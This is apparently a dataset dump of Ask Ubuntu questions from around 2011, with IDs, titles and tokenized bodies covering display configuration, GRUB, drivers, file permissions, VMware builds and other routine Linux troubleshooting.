54511	can not change monitor configuration without causing black screen	i have a laptop ( sony vaio e series ) , with an external monitor attached to it . by default , it puts the two screens in mirror . i do n't like mirror mode for various reasons and want to change it ( turn the laptop screen off and the external monitor on ) . however , whenever i go into the built in monitor configuration tool , take it off of mirror mode , turn the laptop screen off , and hit apply , both screens go black . it worked fine in ubuntu 10.10 , but not in ubuntu 11.04 . does anyone have any suggestions on how to fix this ? thank you . edit : as requested , this should show what video card i have : $ lspci | grep 'vga' 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) edit 2 : some more information : $ xrandr -q screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 8192 x 8192 lvds1 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1366x768 59.9 + 1360x768 59.8 60.0 1024x768 60.0* 800x600 60.3 56.2 640x480 59.9 vga1 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 338mm x 270mm 1280x1024 60.0 + 75.0 1024x768 75.1 70.1 60.0* 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 72.8 75.0 66.7 60.0 720x400 70.1 hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) edit3 : ( again , as requested by the comments ) i typed in : xrandr -- output lvds1 -- off and the laptop screen turned off just fine , with no ill side effects ( okay , my computer froze up once , but that may have been for another reason ) . here is the results of running : display=:0.0 xrandr -q - screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 8192 x 8192 lvds1 connected ( normal left inverted right x axis y axis ) 1366x768 59.9 + 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 338mm x 270mm 1280x1024 60.0 + 75.0 1024x768 75.1 70.1 60.0* 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 72.8 75.0 66.7 60.0 720x400 70.1 hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) so this seems to be working ( although the resolution on the vga is still not at the ( proffered ) 1280x1024 . anyway , still thank you for your help so far .
54515	how to do firmware updates/upgrades to a blackberry	i have several clients/friends that have blackberry and wish to update their phone but without installing windows . any windows . just doing it from ubuntu . how can this be done . the update the mention is for the firmware and new programs for the phone . i do not know much about blackberries since am more of an android guy . at the end they want support for upgrade/update the blackberry from within linux and sync it to the pc ( backups , upload/download stuff to and from it ) . i have seen 2 types of projects working on this : linberry ( from venezuela ; ) ) - http : //linberry.webcindario.com/ barry - http : //www.netdirect.ca/software/packages/barry but so far neither offers updating the firmware or downloading updates . are there any ubuntu blackberry projects i am not aware of .
54519	how to read the txt files i have written in greek ?	i have some txt files containing greek characters , how can i read them @ ubuntu ? when i am opening one of the files i am getting these `` äåõôåñåýùí '' . here is a text file zipped and uploaded at rapidshare .
54520	can not run unity on an asus x53sj	i 've recently bought a new laptop ( asus x53sj ) with these specs : cpu : i5-2410m @ 2.3ghz ram : 4gb gpu : nvidia geforce gt 520m ( 512mb ) when i first booted into ubuntu i got a message saying that unity is not supported . so i believe , i am using gnome . the results of this command /usr/lib/nux/unity_support_test -p : xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . error : unable to create the opengl context what is wrong with it ? also gnome version 2 is currently installed . am i able to use gnome version 3 ?
54521	how can i join together multiple vob files ?	when i ripped a dvd using dvd : :rip , the main title was split into several 1gb vob files . how can i join them to make a single vob file that contains the whole title ?
54523	what is recommeded file system for a grub partition ?	what might be the recommendation file system for a grub partition , so that it will be accessed from most of linux or windows or osx systems .
54525	chown : changing ownership of ` ... ' : operation not permitted	i 'm trying to install wordpress using the following installations . however , when i attempt to open the browser to set up wordpress , i get an error that there is a problem establishing a database connection . i think it 's because of an error i get when i run the chown command . http : //www.techkaki.com/2011/04/how-to-install-wordpress-locally-on-ubuntu-10-10-with-lamp/ chown -r www-data /var/www/wordpress i get a ton of error messages : ... chown : changing ownership of `/var/www/wordpress/wp-admin/network/themes.php ' : operation not permitted chown : changing ownership of `/var/www/wordpress/wp-admin/network/users.php ' : operation not permitted chown : changing ownership of `/var/www/wordpress/wp-admin/network/index.php ' : operation not permitted chown : changing ownership of `/var/www/wordpress/wp-admin/network/sites.php ' : operation not permitted chown : changing ownership of `/var/www/wordpress/wp-admin/network/user-new.php ' : operation not permitted chown : changing ownership of `/var/www/wordpress/wp-admin/network/setup.php ' : operation not permitted chown : changing ownership of `/var/www/wordpress/wp-admin/network/theme-install.php ' : operation not permitted chown : changing ownership of `/var/www/wordpress/wp-admin/network/plugins.php ' : operation not permitted anyone know what 's up with this ?
54529	how to set nic priority ?	i have a wifi dongle as well as a very slow poe wired connection going to my ubuntu box . i want the wifi to be the primary route to the internet , but i also want the poe to be plugged in as well , for ssh purposes in case something with the wifi isnt working . but ubuntu evidently thinks that since the poe is a wired connection , it should be primary , at least this is what i gather from my slow downloads . how to set the priority ? this is a natty box .
54530	how to setup a domain server for manage windows pc 's & ubuntu pc 's ?	i like to manage windows pc 's and ubuntu pc's.can some one explain me on setting up a ubuntu domain server step by step configuration
54531	what 's different between gstreamer0.10-fluendo-mp3 and gstreamer0.10-fluendo-plugins-mp3-partner ?	i was installing some mp3 codecs when i noticed these two , why do we have two of these ? what 's different ?
54532	what will be the future of unity 2d ?	does anybody know something about the future of unity 2d ? will it be available in coming ubuntu releases ? thanx in advance . wolf
54533	how do i get unity to minimize windows individually , not in groups	i am ubuntu 11.04 user ( unity gui ) but i have an issue : i am working on an exercise for my university and i must have open a lot of pdf files , when i minimize them , they minimized in a group on unity launcher and it is not usefull this i would like to minimize them separately each window and not in groups . is this possible ? thanks in advance ! !
54534	where does ubuntu one store my information ?	i would like to get 20gb on ubuntu one , but i am not at ease with the idea of storing my account information for the purpose of automatic renewal . is there a way of acquiring the one year service so my information is only submitted once and not stored .
54536	why does n't grub detect my installation ?	i just reinstalled grub on my computer but it does not detect my kubuntu partition ( /dev/sda1 ) . only the memtest+ entry appears in grub menu . my grub menu version is 1.99~rc1-13ubuntu3 . please help me ! ! this my output using boot_info_script.sh : boot info script 0.60 from 17 may 2011 ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks for ? ? on this drive . = > no boot loader is installed in the mbr of /dev/sdb . sda1 : __________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 11.04 boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/core.img sda2 : __________________________________________ file system : extended partition boot sector type : unknown boot sector info : sda5 : __________________________________________ file system : swap boot sector type : - boot sector info : sdb1 : __________________________________________ file system : vfat boot sector type : fat32 boot sector info : according to the info in the boot sector , sdb1 starts at sector 0 . but according to the info from fdisk , sdb1 starts at sector 63 . operating system : boot files : ============================ drive/partition info : ============================= drive : sda _______________________________________ disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 2,048 484,278,271 484,276,224 83 linux /dev/sda2 484,280,318 488,396,799 4,116,482 5 extended /dev/sda5 484,280,320 488,396,799 4,116,480 82 linux swap / solaris drive : sdb _______________________________________ disk /dev/sdb : 4004 mb , 4004511744 bytes 255 heads , 63 sectors/track , 486 cylinders , total 7821312 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 63 7,807,589 7,807,527 b w95 fat32 '' blkid '' output : ____________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 b8a57e51-613f-45c6-a7f0-5dd74e62e2fd ext4 /dev/sda5 09d61304-c671-4481-b7c4-acb24b6c8c7d swap /dev/sdb1 8220-55e0 vfat ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sdb1 /media/8220-55e0 vfat ( rw , nosuid , nodev , uhelper=udisks , uid=999 , gid=999 , shortname=mixed , dmask=0077 , utf8=1 , showexec ) /dev/sr0 /cdrom iso9660 ( ro , noatime ) =========================== sda1/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( /dev/sda , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root b8a57e51-613f-45c6-a7f0-5dd74e62e2fd linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( /dev/sda , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root b8a57e51-613f-45c6-a7f0-5dd74e62e2fd linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sda1/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=b8a57e51-613f-45c6-a7f0-5dd74e62e2fd / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=09d61304-c671-4481-b7c4-acb24b6c8c7d none swap sw 0 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sda1 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) 116.134162903 = 124.698107904 boot/grub/core.img 1 116.522464752 = 125.115043840 boot/grub/grub.cfg 1 207.804080963 = 223.127932928 boot/initrd.img-2.6.38-10-generic 2 1.727539062 = 1.854930944 boot/initrd.img-2.6.38-8-generic 3 205.950504303 = 221.137670144 boot/vmlinuz-2.6.38-10-generic 1 116.133281708 = 124.697161728 boot/vmlinuz-2.6.38-8-generic 1 207.804080963 = 223.127932928 initrd.img 2 1.727539062 = 1.854930944 initrd.img.old 3 205.950504303 = 221.137670144 vmlinuz 1 116.133281708 = 124.697161728 vmlinuz.old 1 ======================== unknown mbrs/boot sectors/etc : ======================== unknown bootloader on sda2 00000000 2f 73 63 73 69 2f 6c 69 62 69 73 63 73 69 2e 6b |/scsi/libiscsi.k| 00000010 6f 0a 2f 6c 69 62 2f 6d 6f 64 75 6c 65 73 2f 32 |o./lib/modules/2| 00000020 2e 36 2e 33 32 2d 32 31 2d 67 65 6e 65 72 69 63 |.6.32-21-generic| 00000030 2f 6b 65 72 6e 65 6c 2f 64 72 69 76 65 72 73 2f |/kernel/drivers/| 00000040 73 63 73 69 2f 6c 69 62 69 73 63 73 69 5f 74 63 |scsi/libiscsi_tc| 00000050 70 2e 6b 6f 0a 2f 6c 69 62 2f 6d 6f 64 75 6c 65 |p.ko./lib/module| 00000060 73 2f 32 2e 36 2e 33 32 2d 32 31 2d 67 65 6e 65 |s/2.6.32-21-gene| 00000070 72 69 63 2f 6b 65 72 6e 65 6c 2f 64 72 69 76 65 |ric/kernel/drive| 00000080 72 73 2f 73 63 73 69 2f 6c 69 62 73 61 73 0a 2f |rs/scsi/libsas./| 00000090 6c 69 62 2f 6d 6f 64 75 6c 65 73 2f 32 2e 36 2e |lib/modules/2.6.| 000000a0 33 32 2d 32 31 2d 67 65 6e 65 72 69 63 2f 6b 65 |32-21-generic/ke| 000000b0 72 6e 65 6c 2f 64 72 69 76 65 72 73 2f 73 63 73 |rnel/drivers/scs| 000000c0 69 2f 6c 69 62 73 61 73 2f 6c 69 62 73 61 73 2e |i/libsas/libsas.| 000000d0 6b 6f 0a 2f 6c 69 62 2f 6d 6f 64 75 6c 65 73 2f |ko./lib/modules/| 000000e0 32 2e 36 2e 33 32 2d 32 31 2d 67 65 6e 65 72 69 |2.6.32-21-generi| 000000f0 63 2f 6b 65 72 6e 65 6c 2f 64 72 69 76 65 72 73 |c/kernel/drivers| 00000100 2f 73 63 73 69 2f 6c 69 62 73 72 70 2e 6b 6f 0a |/scsi/libsrp.ko.| 00000110 2f 6c 69 62 2f 6d 6f 64 75 6c 65 73 2f 32 2e 36 |/lib/modules/2.6| 00000120 2e 33 32 2d 32 31 2d 67 65 6e 65 72 69 63 2f 6b |.32-21-generic/k| 00000130 65 72 6e 65 6c 2f 64 72 69 76 65 72 73 2f 73 63 |ernel/drivers/sc| 00000140 73 69 2f 6c 70 66 63 0a 2f 6c 69 62 2f 6d 6f 64 |si/lpfc./lib/mod| 00000150 75 6c 65 73 2f 32 2e 36 2e 33 32 2d 32 31 2d 67 |ules/2.6.32-21-g| 00000160 65 6e 65 72 69 63 2f 6b 65 72 6e 65 6c 2f 64 72 |eneric/kernel/dr| 00000170 69 76 65 72 73 2f 73 63 73 69 2f 6c 70 66 63 2f |ivers/scsi/lpfc/| 00000180 6c 70 66 63 2e 6b 6f 0a 2f 6c 69 62 2f 6d 6f 64 |lpfc.ko./lib/mod| 00000190 75 6c 65 73 2f 32 2e 36 2e 33 32 2d 32 31 2d 67 |ules/2.6.32-21-g| 000001a0 65 6e 65 72 69 63 2f 6b 65 72 6e 65 6c 2f 64 72 |eneric/kernel/dr| 000001b0 69 76 65 72 73 2f 73 63 73 69 2f 6d 65 67 00 fe |ivers/scsi/meg..| 000001c0 ff ff 82 fe ff ff 02 00 00 00 00 d0 3e 00 00 00 | ... ... ... ... > ... | 000001d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| * 000001f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa | ... ... ... ... ..u.| 00000200 =============================== stderr messages : =============================== to be able to see for which directory grub2 ( v1.99 ) looks for , install `` unlzma '' .
54537	solution to get data from memory of a process	if i 'm using firefox and filling out a big form ( with lots of text to write ) , and for some reason i accidentally press f5 and all my text in the forms is lost , i can use e.g . hxd on windows to retrieve the text , because they 're still in memory . how can i do the same under ubuntu ?
54547	install eclipse 4.1 manually	i am using ubuntu 11.04 and once installed eclipse 3.5.2 via software center . now i plan to make an upgrade to 4.1 , so i downloaded the *.tar.gz file from here . i replaced the contents in /usr/lib/eclipse and now it 's time to modify the start-up script /usr/bin/eclipse , which i am not familiar with , such as the dependency and the setting , coded in the file . can anyone tell me how to rewrite those parts ? thank you . the script is as follows : ! /bin/sh # work around for e # 290395 / lp : # 458703 # https : //bugs.eclipse.org/bugs/show_bug.cgi ? id=290395 # https : //bugs.launchpad.net/bugs/458703 export gdk_native_windows=true export mozilla_five_home= '' /usr/lib/xulrunner- $ ( /usr/bin/xulrunner-1.9.2 -- gre-version ) '' eclipse=/usr/lib/eclipse/eclipse inject_update_site ( ) { if [ ! -e `` $ 1 '' ] ; then echo `` w : can not find $ 1 '' 2 > & 1 return 1 fi cat - > > '' $ 1 '' < < eof repositories/http\ : __download.eclipse.org_releases_galileo/enabled=true repositories/http\ : __download.eclipse.org_releases_galileo/issystem=false repositories/http\ : __download.eclipse.org_releases_galileo/nickname=galileo update site repositories/http\ : __download.eclipse.org_releases_galileo/uri=http\ : //download.eclipse.org/releases/galileo/ eof } if [ ! -d ~/.eclipse/ ] ; then $ eclipse -clean -initialize || exit $ ? settings=`echo ~/.eclipse/org.eclipse.platform_*/p2/org.eclipse.equinox.p2.engine/profileregistry/platformprofile.profile/.data/.settings/` if [ ! -d `` $ settings '' ] ; then echo `` w : can not inject update-sites , can not find the correct config . '' 2 > & 1 else ( inject_update_site '' $ settings/org.eclipse.equinox.p2.metadata.repository.prefs '' & & \ inject_update_site '' $ settings/org.eclipse.equinox.p2.artifact.repository.prefs '' & & \ echo `` i : injected update sites '' ) || echo `` w : could not inject updatesites . '' 2 > & 1 fi fi exec $ eclipse `` $ @ ''
54548	music sound quality is bad under heavy cpu load	my music sound quality is bad under heavy cpu load . does somebody has the same problem or knows how i can solve this problem ?
54551	how does ubuntu one perform when renaming folders ?	i have a ( somewhat ) large collection of media files on ubuntu one which i need to reorganise ( locally ) by changing folder names , etc . in this situation ( say a folder `` photos a b '' renamed to `` photos_a_b '' ) , how does ubuntu one behave ? does it re-upload all the files ? thanks !
54555	samsung galaxy s2 in download mode breaks lsusb	i have a samsung galaxy s2 . to update it the official way , you need windows and samsung kies ( an application that does the updating ) . the unofficial way lets you do it with a linux-native application called heimdell . to start things off , you need to put the phone in `` download mode '' which involves restarting the phone , holding the home and volume-down buttons while turning it on . i 'm fine up to that point . the problem comes when plugging it into ubuntu . i plug it in , heimdell does n't see anything and ca n't continue . additionally , lsusb stalls for a very long time and then fails to show the samsung . if i unplug the phone lsusb works just fine . the phone seems to be the problem , for some reason . i 've tried this with an ubuntu laptop ( on 64bit 2.6.38 - just as the desktop ) and it registers fine . lsusb works as expected but heimdall has some other issues . i want to get this working on my desktop because then i can let virtualbox take the usb device and i can flash it with odin ( another tool from samsung ) . but as it is , the system does n't see the phone , so i ca n't pass it off . where should i be looking for debugging information ? watching dmesg | tail for a while shows something like this : [ 167976.600142 ] usb 6-1 : new full speed usb device using uhci_hcd and address 4 [ 167991.709360 ] usb 6-1 : device descriptor read/64 , error -110 [ 168006.928436 ] usb 6-1 : device descriptor read/64 , error -110 [ 168007.158227 ] usb 6-1 : new full speed usb device using uhci_hcd and address 5 [ 168022.267425 ] usb 6-1 : device descriptor read/64 , error -110 [ 168037.486529 ] usb 6-1 : device descriptor read/64 , error -110 [ 168037.717116 ] usb 6-1 : new full speed usb device using uhci_hcd and address 6 [ 168043.132523 ] usb 6-1 : device not accepting address 6 , error -84 [ 168043.252408 ] usb 6-1 : new full speed usb device using uhci_hcd and address 7 the longer i watch it , the more of those messages i see . /var/log/udev does n't show anything new when plugging it in .
54559	chrome app icon is in low-resolution during the application switch	i 'm running ubuntu 10.10 and using google chrome ( not chromium ) . i just want to use the `` app '' feature in chrome and i created application shortcuts for gmail , google calendar , and things like that . but the problem is during application switch ( alt + tab ) . in that , chrome 's icon is the app icon . for example , when i launch gmail as a chrome app , the icon is the gmail icon . but that icon is in low-resolution so it kinda makes the view ugly . what i want is i just want to change that icon , but do n't know how to do it . sorry for my poor english . thanks .
54562	looking for code editor software with following functionalities	i am looking for a text editor with the following functionalities for php , html and css coding : code folding based on indentation ( best example is editplus ) start at an indentation level and stop at the next indentation of same level or level up line/block duplication brace highlight syntax highlight selection highlight ( occurrences ) toggle comment line/block good file browser ( several directories opened ) code snippets those are the basic i am looking for . i tried several editors and found them all wanting at some point . gedit with plugins geany with plugins juffed jedit scite ultraedit ... the only one really close to have it all is netbeans except for the code folding based on indentation . i read that vim is highly configurable but i 'm a bit afraid of the learning curve . if anyone know of my dream editor , please inform me .
54565	how to disable bluetooth in gnome 3 ?	i an using ubuntu natty 11.04 with gnome 3 front end . every time i login i have in my top right corner an indication that my bluetooth is activated . i want to it to be deactivated by default and activate it on demand not the other way around , any ideas ?
54573	internet pass-through to android phone	is there any way to use the `` internet pass-through '' feature on ubuntu ? so far i 've only seen it working under windows with the htc share tool . should n't there be something similar for ubuntu ? i 'm using natty narwhal ... thanks in advance for any replies = )
54576	how do i enable print selection in chromium	for my own archive i want to print posts from an internet magazine to pdf files . i use chromium 12.0.742.112 ( 90304 ) on ubuntu 11.04 , but the default option to save to pdf does n't support selection ( of parts to print ) . i know i can install cups-pdf , but i prefer to not have a duplicate pdf solution . is there any way to make this option of print selection in chromium available myself , until google implements this option ? ( it is already present in chrome with the same version nr . on windows xp ) kind regards
54579	how to split larger files into smaller parts ?	i have a large file ( 8gb for example ) . how can i split it into multiple parts , let 's say 3 equal parts , and after that how do i integrate them later ?
54580	how to identify and rectify ip address conflicts in ubuntu ?	we have more than 500 machines running ubuntu . i have noticed that many machines have ip address conflicts . is it possible to identify ip address conflicts in ubuntu ? can someone help ? thanks in advance . update : see the output here . what does it mean actually ? i get same mac address for all the ip addresses ?
54582	dircolors/ls colors not being displayed correctly using byobu	on my nas box running ubuntu 11.04 i 'm experiencing an odd issue with dircolors inside byobu . per the image below , everything works fine outside byobu . the prompt ( zsh ) , vim , and everything else works fine ... it 's just dircolors that do n't appear to be working correctly . one additional note , in putty on windows and iterm2 on os x i 'm using the solarized color theme . steps i 've taken to fix , inside byobu : alake @ foxery : ~/askubuntu » dircolors -p > ~/.dircolors alake @ foxery : ~/askubuntu » echo $ term > > ~/.dircolors # # # restarted ssh session here alake @ foxery : ~/askubuntu » alias ls ls='ls -- color=tty' alake @ foxery : ~/askubuntu » echo $ term & & grep $ term ~/.dircolors screen-256color-bce term screen-256color-bce alake @ foxery : ~/askubuntu » dpkg -la | grep -i byobu ii byobu 3.33-0ubuntu1.1 a set of useful profiles and a profile-switcher for gnu screen iterm : putty : - overriding the alias with ls -- color=auto does n't work .
54590	how to configure network authentication ?	i would like to configure network authentication can any one help me to configue ldap , acl , kerberos step by step
54591	use s2ram when closing lid with kde	when i ask kde to suspend to ram on my laptop , it does not resume properly . however , i installed uswsusp and sudo s2ram -f -a 3 works . is there a way to tell kde that it is supposed to run this command line when closing the lid instead of having to use the console each time ?
54594	why 32bit installation of ubuntu is recommended ?	when i tried to download ubuntu , i have two options : 32bit and 64bit , and 32bit is recommended . is there any reason for this ?
54597	pulseaudio not starting	well here 's an embarrassing problem . pulseaudio does n't seem to be working . i 've been trying to load the sound applet for a week or so and i checked ps aux | grep pulse and found that there 's no pa daemon running ! sound is still working . i assume everything has fallen back to alsa . furthermore i 've tried to start pa from the command line . pulseaudio -d just errors out with nothing useful , just e : main.c : daemon startup failed . pulseaudio on its own raises a little more : $ pulseaudio e : main.c : unknown command : ! /usr/bin/pulseaudio -nf e : main.c : failed to initialise daemon . i can start it as root with -- system but nothing can connect to it . that 's not the right way to run pa , so i 'd rather fix it than bodge around it .
54598	does the iwlwifi wifi driver for intel cards support ap mode ?	ok from my research so far , there is a driver that intel works on for its newer cards called iwlwifi . there 's also iwlagn and i am unsure if they are the same ? anyway , do any of them support ap mode and the cfg80211 architecture ? it seems like the brcm80211 still does not support ap mode so i am looking at alternatives . atheros is a good option so far : ) !
54599	unkown artist/ unknown album in banshee & rhythmbox for all music	i 've been trying to import the music from my cds into banshee but for some reason the music does n't have any information about the artist , album etc e.g . the year is given as `` 1 '' , the names of the tracks are all `` track 1 '' , `` track 2 '' etc and the artist name is `` unknown artist '' . i have also tried it with rythmbox but have encountered the same problems . the strange thing is on previous installs of ubuntu banshee has worked very well at importing music from the same cds i am now having problems with ( i.e . all of them ) . i have a few elementary project ppas installed , could this be messing it up . or is it something else ?
54603	no suspend with virtualbox 4.1.0	since i upgraded to virtualbox 4.1.0 on my 11.04 i 'm having a problem of suspending . this is a known bug and some suggested a workaround by adding the vboxdrv to the modules under /etc/pm/config.d/unload_modules . this indeed solved the problem but only when a vm image is not running . any clue how to workaround it until oracle fixes the bug ? thanks . edit : problem got solved in a future release of virtualbox .
54605	how to change overlay scrollbar color ?	in my /home/myname/.themes/themename/gtkrc file i found this : style `` murrine-scrollbar '' { bg [ selected ] = shade ( 0.6 , @ base_color ) bg [ active ] = @ base_color bg [ normal ] = shade ( 0.85 , @ bg_color ) bg [ prelight ] = shade ( 0.83 , @ selected_bg_color ) engine `` murrine '' { roundness = 9 gradient_shades = { 1.0,1.0,1.0,1.0 } highlight_shade = 1.0 glow_shade = 1.0 reliefstyle = 0 gradient_colors = false lightborder_shade = 1.0 lightborderstyle = 0 trough_shades = { 5.0 , 1.20 } border_shades = { 2.0 , 2.0 } contrast = 0.0 prelight_shade = 0.65 contrast = 0.0 } } style `` hscrollbar '' { } style `` vscrollbar '' { } style `` murrine-scrollbar-dark '' = `` murrine-scrollbar '' { engine `` murrine '' { gradient_shades = { 0.65,0.65,0.65,0.65 } trough_shades = { 1.0 , 1.0 } border_shades = { 0.3 , 0.3 } } } style `` murrine-scrollbar-sidebar '' = `` murrine-scrollbar '' { engine `` murrine '' { trough_shades = { 0.97 , 0.97 } border_shades = { 1.2 , 1.2 } } } style `` murrine-sidebar '' { base [ normal ] = shade ( 1.06 , @ bg_color ) bg [ normal ] = shade ( 1.06 , @ bg_color ) text [ normal ] = mix ( 0.3 , @ bg_color , @ text_color ) base [ selected ] = shade ( 1.0 , `` # 5165e1 '' ) base [ active ] = shade ( 1.0 , `` # 5165e1 '' ) font_name = `` regular '' gtktreeview : :odd_row_color = shade ( 1.06 , @ bg_color ) gtktreeview : :even_row_color = shade ( 1.06 , @ bg_color ) engine `` murrine '' { textstyle = 1 listviewstyle = 0 lightborderstyle = 1 gradient_shades = { 1.18,1.0,1.0,0.85 } } } which line ( or value ) should i change for another color ?
54609	samsung np n150 sp0gin notebook overheating	temperature is more than normal in my samsung np n150 jp0gin netbook running xubuntu11.04 , it reports 64 degrees in normal state and 70 degrees while listening music on grooveshark or installing some software via software centre . can anybody help resolving this problem ? moreover xubuntu 11.04 sucks battery more fast than windows 7.on ubuntu battery lasts only 4 hours while in windows 7 it usually lasts 7 or 8 hours . kernel version:2.6.38-10-generic
54611	wacom bamboo cth-461 in ubuntu 11.04	i 've got a wacom bamboo cth-461 and ubuntu 11.04 . i know , it should work , but it does n't . in elementary os it works , but here ... anyone know why ? i need it : /
54612	vmware server vmnet module compilation problem	i am trying to install vmware server 2.02 on a ubuntu server 10.04.3 64bit version following this guidde https : //help.ubuntu.com/community/vmware/server . however when i execute the script it jus ends after an error /home/cfpte/raducotescu-vmware-server-linux-2.6.3x-kernel-bb26dce/vmware-server-distrib/lib/modules/source/vmnet-only/driver.c:121 : warning : data definition has no type or storage class /home/cfpte/raducotescu-vmware-server-linux-2.6.3x-kernel-bb26dce/vmware-server-distrib/lib/modules/source/vmnet-only/driver.c:121 : warning : type defaults to ‘int’ in declaration of ‘define_semaphore’ /home/cfpte/raducotescu-vmware-server-linux-2.6.3x-kernel-bb26dce/vmware-server-distrib/lib/modules/source/vmnet-only/driver.c:121 : warning : parameter names ( without types ) in function declaration /home/cfpte/raducotescu-vmware-server-linux-2.6.3x-kernel-bb26dce/vmware-server-distrib/lib/modules/source/vmnet-only/filter.c:82 : warning : type defaults to ‘int’ in declaration of ‘define_semaphore’ /home/cfpte/raducotescu-vmware-server-linux-2.6.3x-kernel-bb26dce/vmware-server-distrib/lib/modules/source/vmnet-only/filter.c:82 : warning : parameter names ( without types ) in function declaration /home/cfpte/raducotescu-vmware-server-linux-2.6.3x-kernel-bb26dce/vmware-server-distrib/lib/modules/source/vmnet-only/filter.c : in function ‘vnetfilter_handleusercall’ : /home/cfpte/raducotescu-vmware-server-linux-2.6.3x-kernel-bb26dce/vmware-server-distrib/lib/modules/source/vmnet-only/filter.c:1089 : error : ‘filterioctlsem’ undeclared ( first use in this function ) /home/cfpte/raducotescu-vmware-server-linux-2.6.3x-kernel-bb26dce/vmware-server-distrib/lib/modules/source/vmnet-only/filter.c:1089 : error : ( each undeclared identifier is reported only once /home/cfpte/raducotescu-vmware-server-linux-2.6.3x-kernel-bb26dce/vmware-server-distrib/lib/modules/source/vmnet-only/filter.c:1089 : error : for each function it appears in . ) make [ 2 ] : *** [ /home/cfpte/raducotescu-vmware-server-linux-2.6.3x-kernel-bb26dce/vmware-server-distrib/lib/modules/source/vmnet-only/filter.o ] error 1 make [ 1 ] : *** [ _module_/home/cfpte/raducotescu-vmware-server-linux-2.6.3x-kernel-bb26dce/vmware-server-distrib/lib/modules/source/vmnet-only ] error 2 make : *** [ vmnet.ko ] error 2 there is a problem compiling the vmnet module after it was patched . : ( could somebody point in the rigth direction to fix this ? regards .
54613	can i write to the usb stick that i 'm running ubuntu from ?	i 'm running ubuntu from a `` try ubuntu '' file that i downloaded to my usb stick and booted from . can i mount that very usb stick and write to it while running ubuntu from it ? if so , how ? edit to clarify : it 's not important that settings of applications and such are saved ; i 'm just looking to save some specific data . another edit : i restarted and booted again . this time the usb stick is found ( /dev/sdb1 ) but it is already mounted ( read-only ) to /cdrom , so i ca n't mount it again . a file called `` readme.diskdefines '' on the usb stick says that it 's ubuntu 10.10 i386 .
54616	transcend usb not auto mounting	i have a 16 gb transcend pen drive . one day i had partitioned into 4 , and on one part i had installed ubuntu 11.04 . but after that it seems the usb wo n't auto mount . i have used the fdisk utility and observed that my os ( ubuntu 10.04 ) is detecting the pen drive but not connecting to it , and making it available to my file system . i used fdisk to re-partition it , but this time i removed all partitions . still it is not being detected by the file system ( i.e . not auto-mounted ) ? update 27th jul 2011 10.47 p ist : the usb drive was re-partitioned to have a single fat 32 partition on which the boot flag was set . while trying to mount nautilus gave me the following error : i 'm also including the log messages in the following paste . http : //pastebin.com/raw.php ? i=cnjrmitd
